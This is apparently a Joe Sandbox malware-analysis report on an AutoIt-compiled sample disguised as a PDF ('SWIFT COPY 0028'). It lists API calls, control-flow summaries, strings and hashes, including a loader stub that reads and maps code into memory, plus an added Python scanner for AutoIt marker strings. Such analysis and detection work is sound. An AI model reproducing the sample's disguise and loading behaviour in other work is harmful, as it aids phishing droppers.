                                                                                    • _wcscpy.LIBCMT ref: 0096C096
                                                                                    • _wcscat.LIBCMT ref: 0096C0A9
                                                                                    • __wsplitpath.LIBCMT ref: 0096C0CE
                                                                                    • _wcscat.LIBCMT ref: 0096C0E4
                                                                                    • _wcscat.LIBCMT ref: 0096C0F7
                                                                                    • _wcscmp.LIBCMT ref: 0096C03E
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C65D
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C670
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0096C2A1
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0096C338
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0096C34E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0096C35F
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0096C371
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                    • String ID: p1#v`K$v
                                                                                    • API String ID: 2378138488-1068180069
                                                                                    • Opcode ID: 740f60e81d444cf693fe9261ffb1afba27a6324f199f1a6b8b7b9ee9be83036a
                                                                                    • Instruction ID: 3ee44e3c2fa05b0f21cd2b95488cb23c9ae6417628ec1bee2b90292edcf141dc
                                                                                    • Opcode Fuzzy Hash: 740f60e81d444cf693fe9261ffb1afba27a6324f199f1a6b8b7b9ee9be83036a
                                                                                    • Instruction Fuzzy Hash: E1C10BB1E00229ABDF11DF95DC81FEEB7BDAF89310F1040A6F649E6151DB709A848F61

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00923F86
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00923FB0
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923FC1
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00923FDE
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00923FEE
                                                                                    • LoadIconW.USER32(000000A9), ref: 00924004
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00924013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: 87531b4e51c06657f6f5d03c625ec7656865929e765d7d392d6098d3d3acab48
                                                                                    • Instruction ID: a31ffba8bf5faf1d582f864b59f90337928a9d885ed50e4aebbdf4e2810bbbbb
                                                                                    • Opcode Fuzzy Hash: 87531b4e51c06657f6f5d03c625ec7656865929e765d7d392d6098d3d3acab48
                                                                                    • Instruction Fuzzy Hash: B621EAB5D25358AFDB00DFA4EC89BCDBBB4FB09700F00411AF611AA2A0D7B44944EF91

                                                                                    Control-flow Graph

                                                                                    • Control-flow graph (rendered image, not reproduced): window procedure at 00923742; basic blocks span 00923742-00923845 and 00991DA3-00991EA2 and call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus, plus internal routines 00922FF6, 00923847, 0092390F, 00924FFC, 0093E312, 0093EB83, 0095A5F3, 00964DDD and 009655BD. The executed/not-executed colouring of the blocks is not recoverable in text.
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 009237B3
                                                                                    • KillTimer.USER32(?,00000001), ref: 009237DD
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00923800
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0092380B
                                                                                    • CreatePopupMenu.USER32 ref: 0092381F
                                                                                    • PostQuitMessage.USER32(00000000), ref: 0092382E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: ec48ccfabd2129c7f2564e02cb90b312edfe13cb84af1340e988c08812a29761
                                                                                    • Instruction ID: 35921547c036f9d1c47f8ba5e13af309b25e60de6a3b6aa1636a223e6afe2215
                                                                                    • Opcode Fuzzy Hash: ec48ccfabd2129c7f2564e02cb90b312edfe13cb84af1340e988c08812a29761
                                                                                    • Instruction Fuzzy Hash: 98417EF12282A6ABDF245F68FC8AF79369DFB40301F008515F502D61E4CB7D9E80A7A1

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00923E79
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00923E88
                                                                                    • LoadIconW.USER32(00000063), ref: 00923E9E
                                                                                    • LoadIconW.USER32(000000A4), ref: 00923EB0
                                                                                    • LoadIconW.USER32(000000A2), ref: 00923EC2
                                                                                      • Part of subcall function 00924024: LoadImageW.USER32(00920000,00000063,00000001,00000010,00000010,00000000), ref: 00924048
                                                                                    • RegisterClassExW.USER32(?), ref: 00923F30
                                                                                      • Part of subcall function 00923F53: GetSysColorBrush.USER32(0000000F), ref: 00923F86
                                                                                      • Part of subcall function 00923F53: RegisterClassExW.USER32(00000030), ref: 00923FB0
                                                                                      • Part of subcall function 00923F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923FC1
                                                                                      • Part of subcall function 00923F53: InitCommonControlsEx.COMCTL32(?), ref: 00923FDE
                                                                                      • Part of subcall function 00923F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00923FEE
                                                                                      • Part of subcall function 00923F53: LoadIconW.USER32(000000A9), ref: 00924004
                                                                                      • Part of subcall function 00923F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00924013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: cecb38513daa684925d17b368be1c564370e74d583f51278f7cc4f55f5aeea34
                                                                                    • Instruction ID: d84a0777aac3df3423ddc56022d17e5256355dff6705f0871af966fd8eb723ba
                                                                                    • Opcode Fuzzy Hash: cecb38513daa684925d17b368be1c564370e74d583f51278f7cc4f55f5aeea34
                                                                                    • Instruction Fuzzy Hash: 5F2132B0E18354ABDB14DFA9EC85A9DBFF5FB48310F00411AE215AB2A0D7754A84EF91
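
Added example (not Joe Sandbox code and not the AutoIt runtime's own logic): a Python scanner for the three runtime strings the function listings above recover, the ">>>AUTOIT SCRIPT<<<" marker handled by the _wcscat/_wcscpy path-building routine at 0096FA96, the "AutoIt v3 GUI" window class registered at 00923FB0 and the "AutoIt v3" class registered at 00923F30. Those routines work on wide strings, so the scanner searches UTF-16LE as well as ASCII. The sample bytes at the bottom are constructed for the demonstration. The stock AutoIt3 interpreter carries the same strings, so a hit establishes that the AutoIt v3 runtime is present in the file, which is what "Binary is likely a compiled AutoIt script file" rests on for a sample named like a PDF.

```python
"""Scan a file for the AutoIt v3 runtime strings recovered in this report.

Added example; not part of Joe Sandbox or of the AutoIt runtime. The three
markers are taken from the String IDs of the function blocks above.
"""
from __future__ import annotations

from dataclasses import dataclass
from pathlib import Path

# Strings from the report: script marker, GUI window class, main window class.
MARKERS = (">>>AUTOIT SCRIPT<<<", "AutoIt v3 GUI", "AutoIt v3")
ENCODINGS = ("utf-16-le", "ascii")  # the runtime's own copies are wide (wcs*)


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str
    offset: int


def find_markers(data: bytes) -> list[Hit]:
    """Locate every marker in both encodings.

    Where markers overlap at the same offset ("AutoIt v3" is a prefix of
    "AutoIt v3 GUI") only the longest match is kept.
    """
    best: dict[tuple[str, int], Hit] = {}
    for marker in MARKERS:
        for encoding in ENCODINGS:
            needle = marker.encode(encoding)
            start = 0
            while (pos := data.find(needle, start)) != -1:
                key = (encoding, pos)
                if key not in best or len(best[key].marker) < len(marker):
                    best[key] = Hit(marker, encoding, pos)
                start = pos + 1
    return sorted(best.values(), key=lambda h: (h.offset, h.encoding))


def has_autoit_runtime(data: bytes) -> bool:
    """True when the script marker or the GUI class name is present.

    The bare "AutoIt v3" string is treated as corroboration only: it is
    short enough to occur in unrelated data.
    """
    found = {h.marker for h in find_markers(data)}
    return ">>>AUTOIT SCRIPT<<<" in found or "AutoIt v3 GUI" in found


def scan_file(path: str | Path) -> list[Hit]:
    """Read a file and return its marker hits (hypothetical helper for CLI use)."""
    return find_markers(Path(path).read_bytes())


# Constructed sample: a fake header followed by the wide markers at known offsets.
SAMPLE = (
    b"MZ" + b"\x00" * 62                          # offsets 0..63
    + "AutoIt v3 GUI".encode("utf-16-le")         # offset 64, 26 bytes
    + b"\x00\x00"                                 # offsets 90..91
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")   # offset 92, 38 bytes
    + b"\x00" * 6
    + b"not a marker"
)

if __name__ == "__main__":
    for hit in find_markers(SAMPLE):
        print(f"{hit.offset:#06x} {hit.encoding:<9} {hit.marker}")
    print("AutoIt runtime present:", has_autoit_runtime(SAMPLE))
```

Searching UTF-16LE at every byte offset can match by coincidence inside compressed or encrypted data, so an ASCII-only hit on "AutoIt v3" is weak evidence; the wide ">>>AUTOIT SCRIPT<<<" marker is the strong one. The same "AutoIt v3 GUI" class name can be matched on a live host with FindWindowW, since the listing shows it passed to RegisterClassExW.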

                                                                                    Control-flow Graph

                                                                                    • Control-flow graph (rendered image, not reproduced): function at 010274D8 in the non-PE region at 01024000. The loop 0102758D-010276FF calls CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, internal routines 01028638 and 01028448, then CloseHandle and VirtualFree before returning to the CreateFileW block; the tail 01027705-010277DA ends in VirtualFree. Other internal calls: 01024EE8, 010283E8. The executed/not-executed colouring of the blocks is not recoverable in text.
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010275A9
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010277CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction ID: f529a4247e5893575d5ce8edc83357ca07418b171da9b156e8f0a8b992540e77
                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction Fuzzy Hash: 01A12A74E00219EBEB14CFA8C898BEEBBB5FF58304F208199E555BB280D7759A41CF54

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1134 9249fb-924a25 call 92bcce RegOpenKeyExW 1137 9941cc-9941e3 RegQueryValueExW 1134->1137 1138 924a2b-924a2f 1134->1138 1139 9941e5-994222 call 93f4ea call 9247b7 RegQueryValueExW 1137->1139 1140 994246-99424f RegCloseKey 1137->1140 1145 99423d-994245 call 9247e2 1139->1145 1146 994224-99423b call 926a63 1139->1146 1145->1140 1146->1145
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00924A1D
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009941DB
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0099421A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00994249
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                    • API String ID: 1586453840-614718249
                                                                                    • Opcode ID: f3ee0ed0f03a8b80473a41ce339e41e3dbb4c821924066be544ed15a8ab32e3c
                                                                                    • Instruction ID: b3cdb15e53534bf24b62eaa241e5a6a6e39b9623eadf0563a82dbcd96de90e2d
                                                                                    • Opcode Fuzzy Hash: f3ee0ed0f03a8b80473a41ce339e41e3dbb4c821924066be544ed15a8ab32e3c
                                                                                    • Instruction Fuzzy Hash: 00116D75A11118BEEB00EBA8DD86EEF7BACEF55354F000065B512D6191EA709E029B50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1161 9236b8-923728 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009236E6
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923707
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 0092371B
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 00923724
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 17facc2db9125b720cbf552d2c21c6f6c5c5ae851bd6f6d19480638ab66e8131
                                                                                    • Instruction ID: 3c86003c1a8e7795411b3c7566805992769332cbf13db8d30071af2d1730751b
                                                                                    • Opcode Fuzzy Hash: 17facc2db9125b720cbf552d2c21c6f6c5c5ae851bd6f6d19480638ab66e8131
                                                                                    • Instruction Fuzzy Hash: 3EF0DA755692D07AEB319757AC88E673E7DD7C7F21B00001AFA05AA1A0D5710CD5EAB0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1266 1027298-10273d8 call 1024ee8 call 1027188 CreateFileW 1273 10273da 1266->1273 1274 10273df-10273ef 1266->1274 1275 102748f-1027494 1273->1275 1277 10273f1 1274->1277 1278 10273f6-1027410 VirtualAlloc 1274->1278 1277->1275 1279 1027412 1278->1279 1280 1027414-102742b ReadFile 1278->1280 1279->1275 1281 102742f-1027469 call 10271c8 call 1026188 1280->1281 1282 102742d 1280->1282 1287 1027485-102748d ExitProcess 1281->1287 1288 102746b-1027480 call 1027218 1281->1288 1282->1275 1287->1275 1288->1287
                                                                                    APIs
                                                                                      • Part of subcall function 01027188: Sleep.KERNELBASE(000001F4), ref: 01027199
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010273CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: QH19EQO886G24WOYZOTZ6YLY64D0
                                                                                    • API String ID: 2694422964-1647047224
                                                                                    • Opcode ID: 5b0b2475bcff951e951938b0aec265dbae51eee0ddc3e74e237ed2729759e2a9
                                                                                    • Instruction ID: a9ff87d8681f2bb39f1b2b10d92ccfa6aaf1f1f69d2586a345ed23eb2e924ccb
                                                                                    • Opcode Fuzzy Hash: 5b0b2475bcff951e951938b0aec265dbae51eee0ddc3e74e237ed2729759e2a9
                                                                                    • Instruction Fuzzy Hash: 0A516430D04298EAEF12D7E4C854BEEBFB5AF15304F044199E6487B2C1D7B91B49CB66

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1290 9251af-9251c5 1291 9252a2-9252a6 1290->1291 1292 9251cb-9251e0 call 926b0f 1290->1292 1295 9251e6-925206 call 926a63 1292->1295 1296 993ca1-993cb0 LoadStringW 1292->1296 1299 993cbb-993cd3 call 92510d call 924db1 1295->1299 1301 92520c-925210 1295->1301 1296->1299 1308 925220-92529d call 940d50 call 9250e6 call 940d23 Shell_NotifyIconW call 92cb37 1299->1308 1312 993cd9-993cf7 call 92518c call 924db1 call 92518c 1299->1312 1303 925216-92521b call 92510d 1301->1303 1304 9252a7-9252b0 call 926eed 1301->1304 1303->1308 1304->1308 1308->1291 1312->1308
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0092522F
                                                                                    • _wcscpy.LIBCMT ref: 00925283
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00925293
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00993CB0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 1053898822-1585850449
                                                                                    • Opcode ID: f613adfdf7585d3117209526f8176da7d84bbce1e35ec3a49f03f1b2e5d59f6d
                                                                                    • Instruction ID: bcfcd9ec92a7794847814269c5a5ae29ff5969a56be08522b2bd8879fd97faf0
                                                                                    • Opcode Fuzzy Hash: f613adfdf7585d3117209526f8176da7d84bbce1e35ec3a49f03f1b2e5d59f6d
                                                                                    • Instruction Fuzzy Hash: 6231D07140C750AFD321EB60EC46FDE77D8AF84300F00451EF599860D6EB70AA48CB92
                                                                                    APIs
                                                                                      • Part of subcall function 009241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009239FE,?,00000001), ref: 009241DB
                                                                                    • _free.LIBCMT ref: 009936B7
                                                                                    • _free.LIBCMT ref: 009936FE
                                                                                      • Part of subcall function 0092C833: __wsplitpath.LIBCMT ref: 0092C93E
                                                                                      • Part of subcall function 0092C833: _wcscpy.LIBCMT ref: 0092C953
                                                                                      • Part of subcall function 0092C833: _wcscat.LIBCMT ref: 0092C968
                                                                                      • Part of subcall function 0092C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0092C978
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 805182592-1757145024
                                                                                    • Opcode ID: 9154e2c06ee6326987212da1483a2e3c91ec39946391c525864274e9e376eee2
                                                                                    • Instruction ID: fdeda553b187bc6719c9f4b447aeee6161d88d2704540008f79238449b3bd69d
                                                                                    • Opcode Fuzzy Hash: 9154e2c06ee6326987212da1483a2e3c91ec39946391c525864274e9e376eee2
                                                                                    • Instruction Fuzzy Hash: 22917471910229EFCF04EFA8DC91AEDB7B8BF59310F108429F416AB295DB349A45CF50
                                                                                    APIs
                                                                                      • Part of subcall function 00925374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009E1148,?,009261FF,?,00000000,00000001,00000000), ref: 00925392
                                                                                      • Part of subcall function 009249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00924A1D
                                                                                    • _wcscat.LIBCMT ref: 00992D80
                                                                                    • _wcscat.LIBCMT ref: 00992DB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                                    • String ID: \$\Include\
                                                                                    • API String ID: 3592542968-2640467822
                                                                                    • Opcode ID: 363b8438c96e05d73c94372ab3a208229b89ee9472a8bb2051245120f0f300a2
                                                                                    • Instruction ID: b00c4c17025ed314242c99d287b39b6e6e7ae64f898566dd3936426f04142653
                                                                                    • Opcode Fuzzy Hash: 363b8438c96e05d73c94372ab3a208229b89ee9472a8bb2051245120f0f300a2
                                                                                    • Instruction Fuzzy Hash: F251627142C3809FC714EF59E9C199AB7FCBF99300B50452EF6848B2A1EB709E08DB52
                                                                                    APIs
                                                                                    • __getstream.LIBCMT ref: 009434FE
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00943539
                                                                                    • __wopenfile.LIBCMT ref: 00943549
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                    • String ID: <G
                                                                                    • API String ID: 1820251861-2138716496
